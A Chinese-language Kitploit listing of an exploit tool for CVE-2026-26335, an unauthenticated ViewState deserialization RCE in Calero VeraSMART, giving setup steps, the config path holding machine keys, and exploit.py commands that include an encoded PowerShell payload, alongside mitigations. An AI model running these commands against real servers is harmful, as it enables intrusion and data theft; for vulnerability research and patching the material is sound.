Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-26335-Calero-VeraSMART-RCE — CVE-2026-26335 的自动化利用工具,该漏洞是 Calero VeraSMART 中一个严重的未认证远程代码执行(RCE)漏洞,通过使用静态机器密钥伪造 ASP.NET ViewState 实现利用。包含端点发现、载荷生成和命令执行功能。 | Kitploit
工具/GitHubGitHub/mbanyamer/cve-2026-26335-calero-verasmart-rce
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试红队
GitHubmbanyamer/cve-2026-26335-calero-verasmart-rce

CVE-2026-26335-Calero-VeraSMART-RCE

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-26335 的自动化利用工具,该漏洞是 Calero VeraSMART 中一个严重的未认证远程代码执行(RCE)漏洞,通过使用静态机器密钥伪造 ASP.NET ViewState 实现利用。包含端点发现、载荷生成和命令执行功能。

查看仓库
16个月前尚未审核

👤 作者

Mohammed Idrees Banyamer 安全研究员

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

CVE-2026-26335 - Calero VeraSMART ViewState RCE 漏洞利用

CVE Severity CVSS Platform ASP.NET Python License Author


📌 描述

CVE‑2026‑26335 是 Calero VeraSMART(2022 R1 之前版本)中的一个严重未认证远程代码执行漏洞。

该应用程序使用静态硬编码的 ASP.NET 计算机密钥,且在所有安装实例中共享。
拥有这些密钥的攻击者可以伪造恶意的 ASP.NET ViewState 并触发服务端反序列化 → RCE。

此漏洞利用工具可自动化执行:

  • ViewState 端点发现
  • __VIEWSTATEGENERATOR 提取
  • ysoserial 载荷生成
  • 签名 ViewState 投递
  • 命令执行

⚠️ 影响

  • 未认证 RCE
  • IIS 用户沦陷
  • 域内横向移动
  • 数据窃取
  • 通过 WebShell 实现持久化

🧠 根本原因

CWE‑321 — 硬编码加密密钥

VeraSMART 部署实例重复使用相同的 ASP.NET machineKey:

root@kitploit:~
<machineKey validationKey="STATIC_KEY"
           decryptionKey="STATIC_KEY"
           validation="SHA1"
           decryption="AES" />

任何拥有单个安装实例密钥的攻击者都可以攻击所有实例。


🛠 环境要求

  • Python 3
  • ysoserial.net
  • VeraSMART 计算机密钥
  • 可访问 IIS 的网络

⚙️ 安装

root@kitploit:~
git clone https://github.com/mbanyamer/CVE-2026-26335-VeraSMART-RCE.git
cd CVE-2026-26335-VeraSMART-RCE
wget https://github.com/pwntester/ysoserial.net/releases/latest/download/ysoserial.exe

🔑 获取计算机密钥

密钥并非公开。可从目标获取:

root@kitploit:~
C:\Program Files (x86)\Veramark\VeraSMART\WebRoot\web.config

或通过配套的文件读取漏洞:

CVE‑2026‑26333


🚀 使用方法

检测漏洞

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY --check-only -v

执行命令

root@kitploit:~
python3 exploit.py -t https://target-ip -vk VALIDATION_KEY -dk DECRYPTION_KEY -c "whoami"

指定端点

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY -e /Login.aspx -c "powershell -enc ZQBjAGgAbwAgAEgAYQBjAGsAZQBkAA=="

代理调试

root@kitploit:~
python3 exploit.py -t https://target-ip -vk KEY -dk KEY --proxy http://127.0.0.1:8080 -v

📡 利用流程

  1. 查找 ViewState 端点
  2. 提取生成器
  3. 生成签名载荷
  4. 发送伪造的 ViewState
  5. ASP.NET 反序列化
  6. 命令执行

📊 CVSS

9.8 — 严重 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


🧪 已测试版本

  • VeraSMART 2020
  • VeraSMART 2021
  • VeraSMART 2022(R1 之前)
  • Windows Server 2016/2019
  • IIS 10
  • ASP.NET 4.x

🔒 缓解措施

已在 VeraSMART 2022 R1 中修复:

  • 唯一计算机密钥
  • ViewState 加固
  • 安全密钥存储

临时解决方案:

  • 轮换 machineKey
  • 禁用 ViewState
  • 限制 IIS 暴露面
  • WAF ViewState 规则

📚 参考

  • https://www.vulncheck.com/advisories/calero-verasmart-2022-r1-static-iis-machine-keys-enable-viewstate-rce
  • https://www.calero.com/

⚖️ 免责声明

仅供教育和授权测试使用。 仅可用于您拥有或已获得评估许可的系统。


👤 作者

Mohammed Idrees Banyamer 安全研究员

  • GitHub: https://github.com/mbanyamer
  • Instagram: https://instagram.com/banyamer_security

📊 漏洞利用示意图

下图展示了 CVE‑2026‑26335 在 Calero VeraSMART 中的利用链,静态 ASP.NET 计算机密钥允许伪造恶意 ViewState,从而导致远程代码执行。

root@kitploit:~
flowchart LR
    A[Attacker] --> B[Obtain VeraSMART machineKey]
    B --> C[Discover ViewState endpoint]
    C --> D[Extract __VIEWSTATEGENERATOR]
    D --> E[Generate malicious ViewState via ysoserial]
    E --> F[Sign payload with machineKey]
    F --> G[Send forged POST request]
    G --> H[ASP.NET ViewState deserialization]
    H --> I[TypeConfuseDelegate gadget]
    I --> J[Remote Code Execution on IIS]
下载工具